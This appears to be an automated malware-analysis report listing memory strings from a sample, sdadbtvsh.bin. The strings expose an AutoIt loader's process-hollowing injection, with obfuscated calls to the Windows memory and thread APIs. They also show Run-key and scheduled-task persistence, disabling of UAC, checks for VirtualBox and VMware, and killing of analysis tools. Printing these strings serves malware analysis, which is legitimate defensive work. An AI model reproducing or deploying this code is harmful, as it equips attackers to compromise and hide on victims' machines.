Binary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "uint64 imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "uint64 sizeofstackreserve;" & "uint64 sizeofstackcommit;" & "uint64 sizeofheapreserve;" & "uint64 sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer) |
memstr_f521dc63-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ientrypointnew = dllstructgetdata($timage_optional_header, "addressofentrypoint") |
memstr_9ecaadc9-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ioptionalheadersizeofheadersnew = dllstructgetdata($timage_optional_header, "sizeofheaders") |
memstr_44fe8b5f-f |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $poptionalheaderimagebasenew = dllstructgetdata($timage_optional_header, "imagebase") |
memstr_0a5a2796-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ioptionalheadersizeofimagenew = random(104857600, 209715200, 1) |
memstr_d2ff2c82-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $timage_dir3ctory_entry_basereloc = dllstructcreate("dword virtualaddress; dword size", $ppointer) |
memstr_95224542-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $paddressnewbasereloc = dllstructgetdata($timage_dir3ctory_entry_basereloc, "virtualaddress") |
memstr_b49ab16f-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $paddressnewbasereloc and $isizebasereloc then $frelocatable = true |
memstr_fdefa476-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: consolewrite("!!!not relocatable module. i will try but this may not work!!!" & @crlf) |
memstr_375d623e-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $pzeropoint = _runbinary_allocateexespace($handlerpro, $ioptionalheadersizeofimagenew) |
memstr_b8cb1187-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $pzeropoint = _runbinary_allocateexespaceataddress($handlerpro, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew) |
memstr_cb0edd35-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_unmapviewofsection($handlerpro, $poptionalheaderimagebasenew) |
memstr_9c9e8b93-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $theaders = dllstructcreate("byte[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new) |
memstr_c06916d5-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc'4g |
memstr_b958d137-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc<4p |
memstr_07a1234f-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 185| |
memstr_67817d58-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif45 |
memstr_93c2a76e-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 25 |
memstr_beafd5bf-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc~5> |
memstr_f1468e40-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifp54 |
memstr_044c7d15-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $timage_section_header = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $ppointer) |
memstr_0a9754ba-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $isizeofrawdata = dllstructgetdata($timage_section_header, "sizeofrawdata") |
memstr_1021f23f-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ppointertorawdata = $pheaders_new + dllstructgetdata($timage_section_header, "pointertorawdata") |
memstr_ebfa204c-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ivirtualaddress = dllstructgetdata($timage_section_header, "virtualaddress") |
memstr_1c67e194-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ivirtualsize = dllstructgetdata($timage_section_header, "unionofvirtualsizeandphysicaladdress") |
memstr_ecfab749-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $ivirtualsize and $ivirtualsize < $isizeofrawdata then $isizeofrawdata = $ivirtualsize |
memstr_8038deaf-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, dllstructgetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $ppointertorawdata), 1)) |
memstr_cb47521f-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $ivirtualaddress <= $paddressnewbasereloc and $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc then |
memstr_005a2846-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $trelocraw = dllstructcreate("byte[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress)) |
memstr_3f303aa5-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $frelocate then _runbinary_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523) |
memstr_222969d9-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "write" & "proces" & "smemo" & "ry", "handle", $handlerpro, "ptr", $pzeropoint, "ptr", $pmodule, "dword_ptr", $ioptionalheadersizeofimagenew, "dword_ptr*", 0) |
memstr_f5648c2b-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tpeb = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid") |
memstr_c25ca4d7-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "rea"&"dproces"&"sme"&"mory", "ptr", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0) |
memstr_32dfe5c5-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "writep" & "roc" & "essmem" & "ory", "handle", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0) |
memstr_432ab3b0-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($tcontext, "e" & "ax", $pzeropoint + $ientrypointnew) |
memstr_b8a02692-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $hthread, "ptr", dllstructgetptr($tcontext)) |
memstr_4c017cd9-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)+2{ |
memstr_387e6752-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "dword", "resumethread", "handle", $hthread) |
memstr_14e12db1-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $handlerpro) |
memstr_210308b0-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func _runbinary_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64) |
memstr_86047cca-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $timage_base_relocation = dllstructcreate("dword virtualaddress; dword sizeofblock", $pdata + $irelativemove) |
memstr_df28795c-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ivirtualaddress = dllstructgetdata($timage_base_relocation, "vir"&"tual"&"add"&"ress") |
memstr_4c311be2-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $isizeofblock = dllstructgetdata($timage_base_relocation, "sizeofblock") |
memstr_30309b9b-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $tenries = dllstructcreate("word[" & $inumberofentries & "]", dllstructgetptr($timage_base_relocation) + 8) |
memstr_1f7134ee-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error then return seterror(1, 0, 0) |
memstr_02676aa6-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($bufferasm, 1, $asm) |
memstr_67465d44-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if bitshift($idata, 12) = $iflag then |
memstr_394b7fdd-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $taddress = dllstructcreate("ptr", $pmodule + $ivirtualaddress + bitand($idata, 0xfff)) |
memstr_c3cb89bb-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($taddress, 1, dllstructgetdata($taddress, 1) + $idelta) |
memstr_c6ddcff5-d |
Source: sdadbtvsh.bin, 00000008.00000003.1554858554.0000000001857000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 8___f3c3f786d6c2076657273696f6e3d223/2e302220656e636f64696e673d225554462d38222073746/6e646/6c6f6e653d22796573223f3e0d0*3c6/7373656d626c7920786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e763/22206d6/6e696665737456657273696f6e3d223/2e30223e0d0*20203c6/7373656d626c794964656e746974792076657273696f6e3d223/2e302e302e3022206e6/6d653d224d794/70706c69636/74696f6e2e6/7070222f3e0d0*20203c7472757374496e666f20786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e7632223e0d0*202020203c73656375726974793e0d0*2020202020203c72657/75657374656450726976696c6567657320786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e7633223e0d0*20202020202020203c72657/756573746564457865637574696f6e4c6576656c206c6576656c3d226/73496e766f6_6572222075694/63636573733d22666/6c7365222f3e0d0*2020202020203c2f72657/75657374656450726976696c656765733e0d0*202020203c2f73656375726974793e0d0*20203c2f7472757374496e666f3e0d0*3c2f6/7373656d626c793e0d0* |
memstr_0ef2abaa-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \registry\machine\software\wow6432node\microsoft\windows\currentversion\run\registry\machine\software\wow6432node\microsoft\windows\currentversion\runh |
memstr_857d6f2b-d |
Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: y\machine\software\microsoft\windows\currentversion\run |
memstr_6744e2c5-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ntversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs")) |
memstr_0d84108b-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: regwrite("hkcu64\software\microsoft\windows\currentversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs"))2 |
memstr_f52c04a3-e |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc |
memstr_c10617ab-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif47 |
memstr_c9cbbba2-f |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exitqk3 |
memstr_3e7068a9-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exit3a1 |
memstr_49572409-f |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif4t |
memstr_67e493fe-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc< |
memstr_9296181f-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif |
memstr_fb3860c1-a |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exitfv9 |
memstr_55cc2b71-c |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif! |
memstr_2c31b9a1-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif$h |
memstr_e4f339b3-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifqpq |
memstr_f4491f02-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: elsec |
memstr_52429308-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exit048z |
memstr_18ac213e-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif4z |
memstr_1020c105-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifr |
memstr_174e3a32-e |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @comspec & ' /c ' & "schtasks /create /sc minute /mo 30 /tn " & $taskname & " /tr" & ' "' & filegetshortname($dir3ctory_path & "\" & $exec) & " " & filegetshortname($dir3ctory_path & "\" & $auex) & '"', "", @sw_hide) |
memstr_8d54621e-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: regwrite("hklm64\software\microsoft\windows\currentversion\policies\system", "enablelua", "reg_dword", "0") |
memstr_44f006be-e |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if processexists("vboxservice.exe") then2ji |
memstr_5eea811a-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareuser.exe") then |
memstr_1b8b0259-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareservice.exe") theng4 |
memstr_55e08284-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $startupkey = iniread($settingsfn, $ini_settings, "key", '').v |
memstr_1f510b0d-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(11, 0, 0)hku |
memstr_3a2c2218-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(10, 0, 0) |
memstr_1606ee7f-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(9, 0, 0)p0 |
memstr_93aa6083-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(7, 0, 0)q |
memstr_4cf25955-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(8, 0, 0) |
memstr_0f4aa0b9-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $binary = "" then exit4uu |
memstr_a78e2066-c |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("mshta.exe")e |
memstr_565e2a51-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_net4_regsvc |
memstr_cc47f09e-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_net2_regasm7] |
memstr_736e9aad-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(2, 0, 0) |
memstr_ae8c008e-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $short = "start.lnk" |
memstr_4af1ec03-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("regshot.exe") |
memstr_b260c18d-c |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $irunflag, $tcontext< |
memstr_abc9e610-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(6, 0, 0) |
memstr_d67318c4-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_net2_regsvc |
memstr_9ed801e5-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func denario($var92 = "-1") |
memstr_02cd08e8-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if not $frelocatable then |
memstr_966ff3db-e |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $context_full = 0x100007$ |
memstr_fca93851-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(101, 1, 0)2 |
memstr_2789c223-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $script = "start.vbs" |
memstr_e1e24ab3-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(101, 0, 0)l |
memstr_5092e576-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("taskmgr.exe") |
memstr_0daf4a7d-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func mainpe($executename) |
memstr_d8a50cab-a |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("procexp.exe") |
memstr_e42f5b83-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: winclose("process hacker")9- |
memstr_cf194dd0-f |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(3, 0, 0)2s3% |
memstr_cd6fb333-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(5, 0, 0) |
memstr_c2d7a7d6-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 9l%}5 |
memstr_fbb9d4c2-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_tw_u_nk_329l%}5 |
memstr_fcbb7977-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if winexists("tcpeye") then |
memstr_eeb8ca5e-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(4, 0, 0) |
memstr_5332d881-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(102, 0, 0) |
memstr_9deda46f-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: elseif $imagic = 523 thenqx |
memstr_56600da4-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("taskmgr.exe")m |
memstr_edfe7f0f-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_net4_regasm |
memstr_5535a6dc-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("tcpeye.exe")y265yd95l6246 |
memstr_3db71ab8-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: rtup1 = regread("hkcu64\software\microsoft\windows\currentversion\runonce", $startupkey)l |
memstr_e82319ee-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $startup1 = $install_path & "\" & $install_fo |
memstr_990f6241-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_allocateexespaceataddress($handlerpro, $paddress, $isize)+ |
memstr_5412128e-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "virt"&"uala"&"llo"&"cex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x1000, "dword", 64)) |
memstr_d9688e74-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "ptr", "vi"&"rtualal"&"loc"&"ex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x3000, "dword", 64)) |
memstr_a735e083-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "vir"&"tua"&"lalloc"&"ex", "handle", $handlerpro, "ptr", 0, "dword_ptr", $isize, "dword", 0x3000, "dword", 64) |
memstr_d8744225-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
